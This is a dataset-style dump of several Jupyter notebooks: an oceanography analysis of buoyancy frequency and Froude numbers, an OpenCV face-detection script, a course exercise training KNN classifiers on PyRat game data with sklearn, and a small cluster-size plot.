7, 1098) 0.0110632234048\n8 (9, 7, 1098) 0.0124031425429\n9 (9, 6, 1098) 0.012225554126\n10 (9, 7, 1098) 0.0116716421533\n11 (9, 7, 1098) 0.0125277705359\n12 (9, 2, 1098) 0.0118110675493\n13 (9, 6, 1098) 0.0117886870289\n14 (9, 3, 1098) 0.0107564743981\n15 (5, 7, 1098) 0.0112179594198\n16 (5, 3, 1098) 0.0144991979914\n17 (9, 3, 1098) 0.00875587577357\n18 (9, 3, 1098) 0.0106275686009\n19 (9, 4, 1098) 0.012333180511\n20 (9, 7, 1098) 0.0118250392402\n21 (9, 4, 1098) 0.0129439677513\n22 (9, 7, 1098) 0.0125979529458\n23 (9, 6, 1098) 0.0126424818841\n24 (9, 3, 1098) 0.0113636432119\n25 (9, 6, 1098) 0.0125236500263\n26 (9, 6, 1098) 0.0125499353037\n27 (9, 2, 1098) 0.0117528877319\n28 (9, 4, 1098) 0.011401231538\n29 (9, 5, 1098) 0.0112679367465\n30 (9, 5, 1098) 0.0102891201313\n31 (9, 2, 1098) 0.0100897596802\n32 (9, 6, 1098) 0.0113250296708\n33 (9, 7, 1098) 0.0126732391574\n34 (9, 6, 1098) 0.0116363472431\n35 (9, 5, 1098) 0.0126982071884\n36 (5, 4, 1098) 0.011294103198\n37 (9, 5, 1098) 0.0124413324398\n38 (9, 3, 1098) 0.0122079726973\n39 (4, 2, 1098) 0.0138501868888\n" ] ], [ [ "I think the major differences have to do with the vertical stretching of the grid due to vvl. This is largest at the right side of the domain. I'm not particularly interated in the buoyany frequency in that location, so can I neglec this? Probably. \n\nWhat do the differences look like elsewhere?", "_____no_output_____" ] ], [ [ "yslice=5\nfig, axs = plt.subplots(8,5,figsize=(20,10))\nfor t, ax in zip (np.arange(times.shape[0]), axs.flat):\n ax.pcolor(diff[t,:,yslice,:],vmin=-0.01,vmax = 0.01)\n ax.set_title(t)\n ax.set_ylim([40,0])", "_____no_output_____" ] ], [ [ "How do these differences affect my Froude number calculations?", "_____no_output_____" ] ], [ [ "n2_f_slice= n2_f[:,:,yslice,:]\nrho_slice = rho[:,:,yslice,:]\nu_slice = U[:,:,yslice,:]\n\nn2_slice= n2[:,:,yslice,:]\n\n\nFr_mys, cs, uvgs, dates = froude.froude_time_series(n2_f_slice,rho_slice,u_slice,\n deps,depsU,times, time_origin)\nFr_NEMO, cs, uvgs, dates = froude.froude_time_series(n2_slice,rho_slice,u_slice,\n deps,depsU,times, time_origin)", "/home/nsoontie/anaconda/lib/python2.7/site-packages/numpy/ma/core.py:3900: UserWarning: Warning: converting a masked element to nan.\n warnings.warn(\"Warning: converting a masked element to nan.\")\n" ], [ "xmin = 300; xmax=700\nfig,axs = plt.subplots(2,1,figsize=(10,5),sharex=True)\nax=axs[0]\nax.plot(dates,Fr_mys, label = 'with my N2')\nax.plot(dates,Fr_NEMO, label = 'with NEMOs n2')\nax.set_ylabel('Froude number')\nax.set_title('Average Froude number in region xind = {} -{}'.format(xmin,xmax))\nax.set_ylim([0,2.5])\nax.grid()\nax.legend(loc=0)\nax=axs[1]\nax.plot(dates,np.array(Fr_mys)-np.array(Fr_NEMO))\nax.set_ylabel('Difference')\nax.set_title('Difference, mine-NEMO')\nax.set_ylim([-.05,.05])\nax.grid()", "_____no_output_____" ] ], [ [ "Differences are so small that I'm not going to worry about it. I'm interested in Froude numbers around 1. Calculating buoyancy frequency my own way doens't affect the results to the precision I need. But in the future, I should output n2 as part of the simulation. ", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ] ]
e731255c20d57d4cbb8ef0acacee1e713e6eaf44
2,172
ipynb
Jupyter Notebook
Faces/Image-Faces-Detection/Image_detection(face).ipynb
simransuresh/Computer-Vision-Projects
4eedced056b00706d5530aa6541adb55cd26064a
[ "MIT" ]
null
null
null
Faces/Image-Faces-Detection/Image_detection(face).ipynb
simransuresh/Computer-Vision-Projects
4eedced056b00706d5530aa6541adb55cd26064a
[ "MIT" ]
null
null
null
Faces/Image-Faces-Detection/Image_detection(face).ipynb
simransuresh/Computer-Vision-Projects
4eedced056b00706d5530aa6541adb55cd26064a
[ "MIT" ]
null
null
null
30.591549
117
0.596225
[ [ [ "# Face detection - done for single and multiple faces\r\nimport cv2\r\n\r\n# read the image using imread\r\nfaces_image = cv2.imread(\"./faces.png\")\r\n\r\n# cascade classifier reads the xml input where face features are stored\r\nface_identifier = cv2.CascadeClassifier(\"../../haarcascade_frontalface_default.xml\")\r\n\r\n# convert the image to a gray scale image using cv2 functions\r\ngray_image = cv2.cvtColor(faces_image, cv2.COLOR_BGR2GRAY)\r\n\r\n# the shape of gray image will be 2D\r\ngray_image.shape\r\n\r\n# using the face features learnt use detect multi scale function to detect faces in the image\r\n# scalefactor - Parameter specifying how much the image size is reduced at each image scale\r\n# minNeighbors - Parameter specifying how many neighbors each candidate rectangle should have to retain it\r\nface = face_identifier.detectMultiScale(gray_image, 1.1, 4)\r\n\r\n# draws a rectangle around the face\r\n# thickness of the line is 2 here\r\nfor x, y, w, h in face:\r\n cv2.rectangle(faces_image, (x, y), (x+w, y+h), (0, 255, 0), 2)\r\n\r\n# displaying the image\r\ncv2.imshow(\"face detection\", faces_image)\r\n\r\n# captures a single frame and waits till any key is pressed to exit\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code" ] ]
e7312e2af257d729baedd0ec10c78c0e3b27a404
283,272
ipynb
Jupyter Notebook
session2/Resolved TP1.ipynb
isival/IntroToAI
6d84a3db9e92addb07e2d8ad92eccd5ef1f5a063
[ "MIT" ]
null
null
null
session2/Resolved TP1.ipynb
isival/IntroToAI
6d84a3db9e92addb07e2d8ad92eccd5ef1f5a063
[ "MIT" ]
null
null
null
session2/Resolved TP1.ipynb
isival/IntroToAI
6d84a3db9e92addb07e2d8ad92eccd5ef1f5a063
[ "MIT" ]
null
null
null
250.461538
98,922
0.904608
[ [ [ "Introduction to Artificial Intelligence - TP1 - April 11th 2018 \n--\n\nAt the end of this session, you will be able to : \n- Generate PyRat Datasets for a supervised learning setting\n- Perform basic supervised learning tasks using sklearn\n- Apply supervised learning on PyRat datasets ", "_____no_output_____" ] ], [ [ "# The tqdm package is useful to visualize progress with long computations. \n# Install it using pip \nimport tqdm", "_____no_output_____" ] ], [ [ "Part 1 - Generating PyRat datasets\n--\nFirst and foremost you need the latest version of PyRat. To do that, just clone the [official PyRat repository](https://github.com/vgripon/pyrat). \n\nSyntax is \"git clone repo destinationdir\"", "_____no_output_____" ] ], [ [ "### TO DO : open a terminal tab / window and clone the repo.", "_____no_output_____" ] ], [ [ "You can now launch Pyrat Games. \n\nIn the context of the AI course, we are going to simplify the rules of PyRat a bit.\nIn fact, we are going to remove all walls and mud penalties. Also, we are not going to consider symmetric mazes anymore.\n\nAs such, a default game would be obtained with the following parameters:\n<pre>python3 pyrat.py -p 40 -md 0 -d 0 --nonsymmetric</pre>\n\nIn the supervised and unsupervised projects, we are going to obtain data while looking at plays between two greedy algorithms. Generating 1000 such games while saving data is easily obtained with PyRat by using:\n<pre>python3 pyrat.py -p 40 -md 0 -d 0 --nonsymmetric --rat AIs/manh.py --python AIs/manh.py --tests 1000 --nodrawing --synchronous --save</pre>\n\nWe recommend that you open another Terminal to launch this command, because generating 1000 games will take a few minutes, and you won't be able to evaluate any other cell from the jupyter notebook. \n\nIt is possible to open a terminal window from the \"Home\" Interface of Jupyter Notebook.\n\nPS: If you don't have pygame installed in your machine you can open a terminal and run\n\n<pre>pip install pygame</pre>\n", "_____no_output_____" ], [ "The 1000 generated games will be in the \"saves\" folder.", "_____no_output_____" ] ], [ [ "### TO DO : open a terminal tab / window and launch the command to generate the games", "_____no_output_____" ] ], [ [ "To convert the games into numpy arrays, we will make use of a few functions that we define here. Feel try to modify it later to your own needs. ", "_____no_output_____" ] ], [ [ "import numpy as np\nimport ast\nimport os\n\nmazeHeight = 15\nmazeWidth = 21\n\ndef convert_input(maze, mazeWidth, mazeHeight, piecesOfCheese):\n im_size = (mazeWidth, mazeHeight) \n canvas = np.zeros(im_size,dtype=np.int8)\n for (x_cheese,y_cheese) in piecesOfCheese:\n canvas[x_cheese,y_cheese] = 1\n # For use with sklearn, we flatten the matrix into an vector\n return canvas.ravel()\n\nPHRASES = {\n \"# Random seed\\n\": \"seed\",\n \"# MazeMap\\n\": \"maze\",\n \"# Pieces of cheese\\n\": \"pieces\" ,\n \"# Rat initial location\\n\": \"rat\" ,\n \"# Python initial location\\n\": \"python\" , \n \"rat_location then python_location then pieces_of_cheese then rat_decision then python_decision\\n\": \"play\"\n}\n \nMOVE_DOWN = 'D'\nMOVE_LEFT = 'L'\nMOVE_RIGHT = 'R'\nMOVE_UP = 'U'\n \ntranslate_action = {\n MOVE_LEFT:0,\n MOVE_RIGHT:1,\n MOVE_UP:2,\n MOVE_DOWN:3\n}\n \ndef process_file(filename):\n f = open(filename,\"r\") \n info = f.readline()\n params = dict(play=list())\n while info is not None:\n if info.startswith(\"{\"):\n params[\"end\"] = ast.literal_eval(info)\n break\n if \"turn \" in info:\n info = info[info.find('rat_location'):]\n if info in PHRASES.keys():\n param = PHRASES[info]\n if param == \"play\":\n rat = ast.literal_eval(f.readline())\n python = ast.literal_eval(f.readline())\n pieces = ast.literal_eval(f.readline())\n rat_decision = f.readline().replace(\"\\n\",\"\")\n python_decision = f.readline().replace(\"\\n\",\"\")\n play_dict = dict(\n rat=rat,python=python,piecesOfCheese=pieces,\n rat_decision=rat_decision,python_decision=python_decision)\n params[param].append(play_dict)\n else:\n params[param] = ast.literal_eval(f.readline())\n else:\n print(\"did not understand:\", info)\n break\n info = f.readline()\n return params", "_____no_output_____" ] ], [ [ "Now we are ready to parse the \"saves\" folder in order to generate the data into a numpy array. \n\n**N.b. you don't have to run this cell if you want to just run through the provided correction of TP1, we provide a npz file with a saved dataset**", "_____no_output_____" ] ], [ [ "\ngames = list()\ndirectory = \"saves/\"\nfor root, dirs, files in os.walk(directory):\n for filename in tqdm.tqdm(files):\n try:\n if filename.startswith(\".\"):\n continue\n game_params = process_file(directory+filename)\n games.append(game_params)\n except:\n print(\"Filename {} did not work\".format(filename))\n\nx = np.array([]).reshape(0,mazeWidth * mazeHeight)\ny = np.array([]).reshape(0,1)\nwins_python = 0\nwins_rat = 0\nfor game in tqdm.tqdm(games):\n if game[\"end\"][\"win_python\"] == 1: \n wins_python += 1\n elif game[\"end\"][\"win_rat\"] == 1:\n wins_rat += 1 \n canvas = convert_input(game[\"maze\"], mazeWidth, mazeHeight, game[\"play\"][0][\"piecesOfCheese\"])\n if game[\"end\"][\"win_python\"] == 1:\n y = np.append(y,1)\n elif game[\"end\"][\"win_rat\"] == 1:\n y = np.append(y,-1)\n else:\n y = np.append(y,0)\n x = np.concatenate([x, canvas.reshape(1,-1)], axis=0)", "_____no_output_____" ] ], [ [ "x and y are numpy array, feel free to save them to a .npz file as seen in TP0. ", "_____no_output_____" ] ], [ [ "### CELL TO BE COMPLETED\n### CHECK THE SHAPES OF X AND Y \n### SAVE X AND Y IN A NPZ FILE \n\nprint(x.shape,y.shape)\nnp.savez(\"dataset.npz\",x=x,y=y)", "_____no_output_____" ] ], [ [ "Part 2 - Basics of machine learning using sklearn\n--", "_____no_output_____" ], [ "sklearn is a very powerful package that implements most machine learning methods. sklearn also includes cross-validation procedures in order to prevent overfitting, many useful metrics and data manipulation techniques that enables very careful experimentations with machine learning. It is also very straightforward to use. We will introduce a few basic concepts of sklearn. ", "_____no_output_____" ], [ "First, it is very easy to simulate data with sklearn. ", "_____no_output_____" ] ], [ [ "from sklearn.datasets import make_blobs", "_____no_output_____" ] ], [ [ "Use the function make_blobs to generate clouds of points with $d=2$, and visualize them using the function scatter from matplotlib.pyplot. You can generate as many samples as you want.\n\nYou can generate several clouds of points using the argument centers. We recommend using random_state=0 so that your results are from the same distribution from our tests \n\nVocabulary : n_samples is the number of generated samples, n_features is $d$ (number of dimensions), centers are the number of classes. \n\nhint : you can use the output \"y\" as an argument for the color argument (\"c\") of the scatter function", "_____no_output_____" ] ], [ [ "### CELL TO BE COMPLETED - generate blobs\n\nx_blobs,y_blobs = make_blobs(n_samples=2000,n_features=2,centers=4,random_state=0)\n", "_____no_output_____" ], [ "### CELL TO BE COMPLETED - plot\n### Don't forget to import pyplot and use %matplotlib inline\n\nimport matplotlib.pyplot as plt \n\n%matplotlib inline \n\nplt.scatter(x_blobs[:,0],x_blobs[:,1],c=y_blobs) \n# Here we use indexing to get feature 0 from all examples as the x-axis of our graph.\n# Feature 1 from x is used as the y-axis of the graph. \n# The color of the points is determined by the value in y \n", "_____no_output_____" ] ], [ [ "You can use the other arguments from make_blobs in order to change the variance of the blobs, or the coordinates of their center. You can also experiment in higher dimension, although it becomes difficult to visualize. ", "_____no_output_____" ], [ "sklearn has many other data generators, as well as ways to load standard datasets of various sizes. Check them out here : \n\nhttp://scikit-learn.org/stable/datasets/index.html\n", "_____no_output_____" ], [ "Now that we have generated a simple dataset, let's try to do a basic supervised learning approach. \n\nFirst, in order to mesure the model capability of generalizing, we will have to split the dataset into a training set and a test set. This split is also called cross validation. The test set is a part of your dataset that your model will not see during the training and will be used as a proxy for your \"real world\" examples.\n\n<center><img src=\"https://cdn-images-1.medium.com/max/1600/1*u03UsvBGwkYD4E7BObpcaw.png\"></center>\n<center><small>Image taken from https://towardsdatascience.com/machine-learning-workflow-on-diabetes-data-part-01-573864fcc6b8</small></center>", "_____no_output_____" ], [ "Sklearn has functions to do so, with parameters controlling how to split the dataset so we are going to be showing how you should do. \n\nUse the train_test_split function in order to generate x_train,x_test, y_train, y_test, from the blobs we just generated, here we split the dataset in 80% train and 20% test. We use random_state = 0 so that the function always returns the same split.", "_____no_output_____" ] ], [ [ "from sklearn.model_selection import train_test_split\n\n#### CELL TO BE COMPLETED \n\nx_train, x_test, y_train, y_test = train_test_split(x_blobs,y_blobs,test_size=0.2,random_state=0)", "_____no_output_____" ] ], [ [ "Check the shapes of the generated vectors", "_____no_output_____" ] ], [ [ "x_train.shape,x_test.shape,x_blobs.shape", "_____no_output_____" ] ], [ [ "Let's use a K-Nearest Neighbor classifier to test whether we can classify this data. Create a <b>classifier</b>, train it using your <b> training set </b> and evaluate it by its <b>accuracy</b> on both <b>the train and test sets</b>. \n\nA k-nearest neighbor classifier (also known as KNN) is a method where for each object that you want to predict the class you look at the K (an hyperparameter) nearest examples from the training (using a distance metric, in our case the euclidean distance). This object is then classified by a majority vote from those neighbors, in other words the object is predicted with the most common class among its neighbours.\n\nTo use a Nearest Neighbor with sklearn you have to use the class [KNeighborsClassifier](http://scikit-learn.org/stable/modules/generated/sklearn.neighbors.KNeighborsClassifier.html#sklearn.neighbors.KNeighborsClassifier).\n\nThe sklearn API is consistent between the methods. This means that for almost every method they propose you can train it using [object.fit](http://scikit-learn.org/stable/modules/generated/sklearn.neighbors.KNeighborsClassifier.html#sklearn.neighbors.KNeighborsClassifier.fit), you can use it to make prediction with [object.predict](http://scikit-learn.org/stable/modules/generated/sklearn.neighbors.KNeighborsClassifier.html#sklearn.neighbors.KNeighborsClassifier.predict) and finally verify the <b>accuracy</b> of the method using [object.score](http://scikit-learn.org/stable/modules/generated/sklearn.neighbors.KNeighborsClassifier.html#sklearn.neighbors.KNeighborsClassifier.score)", "_____no_output_____" ] ], [ [ "from sklearn.neighbors import KNeighborsClassifier\nk = 1\nclassifier = KNeighborsClassifier(n_neighbors=k,n_jobs=1)\n\n### CELL TO BE COMPLETED - train the classifier and get the accuracy in both sets.\nclassifier.fit(x_train,y_train)\nprint(\"Accuracy on the training set {}%\".format(classifier.score(x_train,y_train)*100))\nprint(\"Accuracy on the test set {}%\".format(classifier.score(x_test,y_test)*100))", "Accuracy on the training set 100.0%\nAccuracy on the test set 91.0%\n" ] ], [ [ "Your classifier should have a train accuracy of 1, while the test accuracy should be high but not perfect.\n\nThis is caused by the bias-variance trade-off. The 1NN classifier always has a bias of 0 (it perfectly classifies the training set) but it should have a high variance given that having one more example in the training set can completely change a decision.\n\nTo try to avoid having such a high variance, test different values of k and plot the accuracies given the different values of the hyperparameter k. \n\nIf you have time we advise you to do the same analysis but varying the train/test split size.", "_____no_output_____" ] ], [ [ "train_acc = list()\ntest_acc = list() # list to add the test set accuracies\ntest_ks = range(1,25)# list containing values of k to be tested\n\n# CELL TO BE COMPLETED - Train networks with varying k\nfor k in tqdm.tqdm(test_ks):\n local_classifier = KNeighborsClassifier(n_neighbors=k)\n local_classifier.fit(x_train,y_train)\n train_acc.append(local_classifier.score(x_train,y_train))\n test_acc.append(local_classifier.score(x_test,y_test))\n\nplt.plot(test_ks,train_acc,color=\"blue\",label=\"train set\")\nplt.plot(test_ks,test_acc,color=\"green\",label=\"test set\")\nplt.xlabel(\"K\")\nplt.ylabel(\"Accuracy\")\nplt.legend()\nprint(\"Best k: {}, Best test accuracy {}%\".format(test_ks[np.argmax(test_acc)],max(test_acc)*100))", "100%|██████████| 24/24 [00:00<00:00, 57.20it/s]\n" ] ], [ [ "With the classifier trained, bias-variance analysed, it is now time to look at other metrics based on your results. It is important to remember that accuracy is a key metric, but it is not the <b> only </b> metric you should be focusing on.\n\nWe are going to be printing a [classification report](http://scikit-learn.org/stable/modules/generated/sklearn.metrics.classification_report.html#sklearn.metrics.classification_report) and the [confusion matrix](http://scikit-learn.org/stable/modules/generated/sklearn.metrics.confusion_matrix.html#sklearn.metrics.confusion_matrix) for both the training and test sets\n\nIn the classification report we are going to see 3 new metrics. They are really important because the accuracy does not show a complete portrait of your results.\n\n* Precision: What is the percentage of cases that your model was correct while predicting the given class\n* Recall: What is the percentage of cases that your model was correct when the example was a member of the given class.\n* F1 Score: The harmonic mean from precision and recall.", "_____no_output_____" ] ], [ [ "from sklearn.metrics import classification_report,confusion_matrix\ny_pred_train = classifier.predict(x_train)\nreport = classification_report(y_true=y_train,y_pred=y_pred_train)\nmatrix = confusion_matrix(y_true=y_train,y_pred=y_pred_train)\nprint(\"Training Set:\")\nprint(report)\nprint(matrix)\nplt.matshow(matrix)\nplt.colorbar()\nplt.xlabel(\"Real class\")\nplt.ylabel(\"Predicted class\")", "Training Set:\n precision recall f1-score support\n\n 0 1.00 1.00 1.00 404\n 1 1.00 1.00 1.00 397\n 2 1.00 1.00 1.00 400\n 3 1.00 1.00 1.00 399\n\navg / total 1.00 1.00 1.00 1600\n\n[[404 0 0 0]\n [ 0 397 0 0]\n [ 0 0 400 0]\n [ 0 0 0 399]]\n" ], [ "### CELL TO BE COMPLETED - Generate the report and confusion matrix for the test set.\ny_pred_test = classifier.predict(x_test)\nreport = classification_report(y_true=y_test,y_pred=y_pred_test)\nmatrix = confusion_matrix(y_true=y_test,y_pred=y_pred_test)\nprint(\"Test Set:\")\nprint(report)\nprint(matrix)\nplt.matshow(matrix)\nplt.colorbar()\nplt.xlabel(\"Real class\")\nplt.ylabel(\"Predicted class\")", "Test Set:\n precision recall f1-score support\n\n 0 0.80 0.90 0.84 96\n 1 0.96 0.92 0.94 103\n 2 0.90 0.84 0.87 100\n 3 0.99 0.98 0.99 101\n\navg / total 0.91 0.91 0.91 400\n\n[[86 3 6 1]\n [ 5 95 3 0]\n [15 1 84 0]\n [ 2 0 0 99]]\n" ] ], [ [ "Finally we are going to plot the decision boundaries from our model. For this you should use the function plot_boundaries given below. You can only do this if the tensor representing your data is two dimensional.\n\nThis function will be testing our model with values ranging from the smallest x to the highest x and from the lowest y to the highest y each varying by $h$ and plotting it nicely. [Link to the original implementation](http://scikit-learn.org/stable/auto_examples/neighbors/plot_classification.html#sphx-glr-auto-examples-neighbors-plot-classification-py)", "_____no_output_____" ] ], [ [ "from matplotlib.colors import ListedColormap\ndef plot_boundaries(classifier,X,Y,h=0.2):\n x0_min, x0_max = X[:, 0].min() - 1, X[:, 0].max() + 1\n x1_min, x1_max = X[:, 1].min() - 1, X[:, 1].max() + 1\n x0, x1 = np.meshgrid(np.arange(x0_min, x0_max,h),\n np.arange(x1_min, x1_max,h))\n dataset = np.c_[x0.ravel(),x1.ravel()]\n Z = classifier.predict(dataset)\n\n # Put the result into a color plot\n Z = Z.reshape(x0.shape)\n plt.figure()\n plt.pcolormesh(x0, x1, Z)\n\n # Plot also the training points\n plt.scatter(X[:, 0], X[:, 1], c=Y,\n edgecolor='k', s=20)\n plt.xlim(x0.min(), x0.max())\n plt.ylim(x1.min(), x1.max())\nplot_boundaries(classifier,x_train,y_train)", "_____no_output_____" ] ], [ [ "Part 3 - Application to PyRat Datasets\n--\n\nNow it is your turn, generate a pyrat dataset, load it in the notebook and evaluate a KNN classifier using sklearn", "_____no_output_____" ], [ "In this corrected version of TP1, we load an example generated dataset", "_____no_output_____" ] ], [ [ "x = np.load(\"dataset_correction.npz\")['x']\ny = np.load(\"dataset_correction.npz\")['y']", "_____no_output_____" ] ], [ [ "First we check the shapes for our x and y that we defined before", "_____no_output_____" ] ], [ [ "x.shape,y.shape", "_____no_output_____" ] ], [ [ "As we did in the make blobs case, we are going to be splitting our data in train and test splits", "_____no_output_____" ] ], [ [ "x_train, x_test, y_train, y_test = train_test_split(x,y,test_size=0.2,random_state=0)", "_____no_output_____" ] ], [ [ "We train a KNN classifier", "_____no_output_____" ] ], [ [ "from sklearn.neighbors import KNeighborsClassifier\nk = 1\nclassifier = KNeighborsClassifier(n_neighbors=k,n_jobs=1)\n\n### CELL TO BE COMPLETED - train the classifier and get the accuracy in both sets.\nclassifier.fit(x_train,y_train)\nprint(\"Accuracy on the training set {}%\".format(classifier.score(x_train,y_train)*100))\nprint(\"Accuracy on the test set {}%\".format(classifier.score(x_test,y_test)*100))", "Accuracy on the training set 100.0%\nAccuracy on the test set 47.5%\n" ] ], [ [ "We find the best k value for this split. Normally this would be done over the mean best k value over several train/test splits", "_____no_output_____" ] ], [ [ "train_acc = list()\ntest_acc = list() # list to add the test set accuracies\ntest_ks = range(1,25)# list containing values of k to be tested\n\n# CELL TO BE COMPLETED - Train networks with varying k\nfor k in tqdm.tqdm(test_ks):\n local_classifier = KNeighborsClassifier(n_neighbors=k,n_jobs=-1)\n local_classifier.fit(x_train,y_train)\n train_acc.append(local_classifier.score(x_train,y_train))\n test_acc.append(local_classifier.score(x_test,y_test))\n\nplt.plot(test_ks,train_acc,color=\"blue\",label=\"train accuracy\")\nplt.plot(test_ks,test_acc,color=\"green\",label=\"test accuracy\")\nplt.xlabel(\"K\")\nplt.ylabel(\"Accuracy\")\nplt.legend()\nprint(\"Best k: {}, Best test accuracy {}%\".format(test_ks[np.argmax(test_acc)],max(test_acc)*100))\n\n\n#Retrain the classifier with the best k for the analysis\n\nfrom sklearn.neighbors import KNeighborsClassifier\nk = test_ks[np.argmax(test_acc)]\nclassifier = KNeighborsClassifier(n_neighbors=k,n_jobs=1)\n\nclassifier.fit(x_train,y_train)\nprint(\"Accuracy on the training set {}%\".format(classifier.score(x_train,y_train)*100))\nprint(\"Accuracy on the test set {}%\".format(classifier.score(x_test,y_test)*100))", "100%|██████████| 24/24 [00:07<00:00, 3.00it/s]\n" ] ], [ [ "Show the classification report and confusion matrix", "_____no_output_____" ] ], [ [ "from sklearn.metrics import classification_report,confusion_matrix\ny_pred_train = classifier.predict(x_train)\nreport = classification_report(y_true=y_train,y_pred=y_pred_train)\nmatrix = confusion_matrix(y_true=y_train,y_pred=y_pred_train)\nprint(\"Training Set:\")\nprint(report)\nprint(matrix)\nplt.matshow(matrix)\nplt.colorbar()\n\nplt.xlabel(\"Predicted Class\")\nplt.ylabel(\"Real Class\")", "Training Set:\n precision recall f1-score support\n\n -1.0 0.57 0.73 0.64 344\n 0.0 0.31 0.04 0.07 99\n 1.0 0.63 0.61 0.62 357\n\navg / total 0.56 0.59 0.56 800\n\n[[250 5 89]\n [ 55 4 40]\n [137 4 216]]\n" ] ], [ [ "Here we see that differently from the make blobs case the classes are not balanced, so even if you were correctly classyfing all of the draw examples, the color on the confusion matrix would make it seem like a bad model for that class. We have to normalize the confusion matrix by the amount of examples on each class, so that the sum of each row of the matrix is 1.", "_____no_output_____" ] ], [ [ "from sklearn.metrics import classification_report,confusion_matrix\ny_pred_train = classifier.predict(x_train)\nreport = classification_report(y_true=y_train,y_pred=y_pred_train)\nmatrix = confusion_matrix(y_true=y_train,y_pred=y_pred_train)\nnormalized_matrix = matrix/np.sum(matrix,axis=1)\nprint(\"Training Set:\")\nprint(report)\nprint(matrix)\n\nplt.matshow(matrix)\nplt.colorbar()\nplt.xlabel(\"Predicted Class\")\nplt.ylabel(\"Real Class\")\n\nplt.matshow(normalized_matrix,vmin=0,vmax=1)\nplt.colorbar()\nplt.xlabel(\"Predicted Class\")\nplt.ylabel(\"Real Class\");", "Training Set:\n precision recall f1-score support\n\n -1.0 0.57 0.73 0.64 344\n 0.0 0.31 0.04 0.07 99\n 1.0 0.63 0.61 0.62 357\n\navg / total 0.56 0.59 0.56 800\n\n[[250 5 89]\n [ 55 4 40]\n [137 4 216]]\n" ] ], [ [ "And now the test set", "_____no_output_____" ] ], [ [ "### CELL TO BE COMPLETED - Generate the report and confusion matrix for the test set.\ny_pred_test = classifier.predict(x_test)\nreport = classification_report(y_true=y_test,y_pred=y_pred_test)\nmatrix = confusion_matrix(y_true=y_test,y_pred=y_pred_test)\nnormalized_matrix = matrix/np.sum(matrix,axis=1)\n\nprint(\"Test Set:\")\nprint(report)\nprint(matrix)\nprint(normalized_matrix)\n\n\nplt.matshow(matrix)\nplt.colorbar()\nplt.xlabel(\"Predicted Class\")\nplt.ylabel(\"Real Class\")\n\nplt.matshow(normalized_matrix,vmin=0,vmax=1)\nplt.colorbar()\nplt.xlabel(\"Predicted Class\")\nplt.ylabel(\"Real Class\");", "Test Set:\n precision recall f1-score support\n\n -1.0 0.60 0.58 0.59 96\n 0.0 0.33 0.05 0.08 22\n 1.0 0.50 0.63 0.56 82\n\navg / total 0.53 0.55 0.52 200\n\n[[56 1 39]\n [ 9 1 12]\n [29 1 52]]\n[[ 0.58333333 0.04545455 0.47560976]\n [ 0.09375 0.04545455 0.14634146]\n [ 0.30208333 0.04545455 0.63414634]]\n" ] ], [ [ "Here we can see that we have a real problem identifying the draws. This is caused by a problem called [Class Imbalance](http://www.chioka.in/class-imbalance-problem/).\n\nThis problem can create a bias in most algorithms leading to a poor recall percentage. On the other side of class imbalance we can see that the network overpredicts the -1 result, leading to a good recall percentage, but not necessarily good precision. Looking the effects of doing class balancing (using the indexing ideas from the end of TP0) could be very interesting for your project!", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
e7314752f6075129644b4986de6363cab4e3e6d1
12,717
ipynb
Jupyter Notebook
validation_studies_dataset5/cotAlpha/clusterGraph.ipynb
jieunyoo/directional-pixel-detectors
7450a985e79b6c13652796ce33487d4b87c7f014
[ "Apache-2.0" ]
2
2022-01-21T23:50:57.000Z
2022-02-06T01:11:18.000Z
validation_studies_dataset5/cotAlpha/clusterGraph.ipynb
jieunyoo/directional-pixel-detectors
7450a985e79b6c13652796ce33487d4b87c7f014
[ "Apache-2.0" ]
null
null
null
validation_studies_dataset5/cotAlpha/clusterGraph.ipynb
jieunyoo/directional-pixel-detectors
7450a985e79b6c13652796ce33487d4b87c7f014
[ "Apache-2.0" ]
4
2021-12-25T21:53:26.000Z
2022-03-07T23:08:09.000Z
110.582609
10,376
0.881419
[ [ [ "import numpy as np\nimport pandas as pd\nfrom pandas import read_csv\nimport math\nimport seaborn as sns\nimport matplotlib.pyplot as plt", "_____no_output_____" ], [ "df1 = pd.read_csv('clusterData.csv', header=None)", "_____no_output_____" ], [ "df1.columns = ['binBegin', 'binEnd', 'nEntries','avg', 'Sem']", "_____no_output_____" ], [ "#df1\navgList = list(df1['avg'])\n#avgList\nsemList = list(df1['Sem'])\n#semList\nxList = list(df1['binBegin'])\ny_error = semList", "_____no_output_____" ], [ "y_error = semList\nplt.scatter(xList,avgList)\nplt.ylabel('x-size')\nplt.xlabel('cotAlpha')\nplt.title('x-clusterSize vs cotAlpha')\n#plt.errorbar(xList, avgList, yerr = y_error,fmt='.',ecolor = 'red',)\nplt.errorbar(xList, avgList, yerr = y_error, fmt='+', color='white')\nplt.savefig('clusterCotAlpha.png')", "_____no_output_____" ] ] ]
[ "code" ]
